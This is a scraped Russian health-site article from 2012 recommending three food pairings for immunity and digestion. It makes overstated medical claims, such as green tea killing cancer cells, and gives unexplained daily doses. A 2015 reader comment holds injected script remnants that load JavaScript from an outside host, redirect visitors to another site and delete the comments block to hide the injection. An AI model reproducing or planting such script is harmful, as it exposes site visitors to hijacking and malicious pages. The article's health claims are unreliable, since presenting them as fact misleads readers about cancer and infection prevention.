Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сладкие парочки  >>  Сладкие парочки
 
Обратная связь
 

Сладкие парочки

Размер шрифта
16 января 2012 08:57
  • google_analytics: false
  • Нравится

Если есть вместе эти продукты, пользы будет больше. Представляем 3 сладкие парочки продуктов, которые делают нас здоровыми.

Суперпарочки – сочетание еды, которое удваивает пользу каждого продукта.
 

  1. Зеленый чай и перец чили

1

Зеленый чай
  • Содержит антиоксиданты, которые убивают раковые клетки, обладают антибактериальными и противовирусными свойствами.
  • Предотвращает распространение заболеваний, ускоряет восстановление после простуды и гриппа.
  • Уничтожает 7 видов опасных бактерий, в том числе клостридий, ботулус и стафилококк.

Перец чили

  • Имеет жгучий вкус благодаря веществу капсаицину, который повышает наш иммунитет и ускоряет обмен веществ. К тому же капсаицин может выступать в роли мощного антиоксиданта, оберегающего клетки от свободных радикалов.

В чем польза парочки?

  • Благодаря антиоксидантам зеленый чай укрепляет иммунитет. А в это время перец чили атакует капсаицином свободные радикалы, которые приводят к раку.

Сочетание зеленого чая и перца чили вместе укрепляет наш иммунитет.

Ежедневная доза зеленого чая – 720 мл.
Ежедневная доза перца чили – 30-120 мг.


  1. Йогурт и бананы

1

Йогурт
  • Содержит живые бактерии – пробиотики, которые способствуют укреплению иммунитета, принимают участие в создании здоровой кишечной микрофлоры, нормализуют пищеварение. Одним из важнейших свойств пробиотиков является их способность уничтожать вредные микроорганизмы.
  • В йогуртах содержатся бактерия LGG, которая препятствует размножению патогенных микроорганизмов в кишечнике.
  • Бактерия L.casei, которая содержится в йогуртах, укрепляет микрофлору кишечника и восстанавливает ее приема антибиотиков.

Бананы

  • Содержат вещества, убивающие бактерии, которые приводят к язве желудка.

В чем польза парочки?

  • Йогурта и банан нормализуют пищеварение, успешно борются с микробами, активизируют работу желудочно-кишечного тракта и помогают избежать тяжести в желудке.

Ежедневная доза йогурта – 250 мл.
Ежедневная доза бананов – 3 шт.


  1. Фасоль и желтый болгарский перец

1 

Фасоль

  • Фасоль содержит большое количество железа. Железо необходимо для многих метаболических процессов в организме. Железо участвует в переносе кислорода к тканям и удалении из них углекислого газа.

Болгарский желтый перец

  • По содержанию витамина С сладкий перец (особенно желтый) превосходит лимон и даже черную смородину!
  • В перце много аскорбиновой кислоты и витамина Р (рутина). Такое сочетание укрепляет кровеносные сосуды и снижает проницаемость их стенок.

В чем польза парочки?

Благодаря витамину С, который содержится в перце, железо из фасоли быстрее и лучше усваивается.


Сюжеты по теме:
Продукты для иммунитета. Сладкие парочки

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:00

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.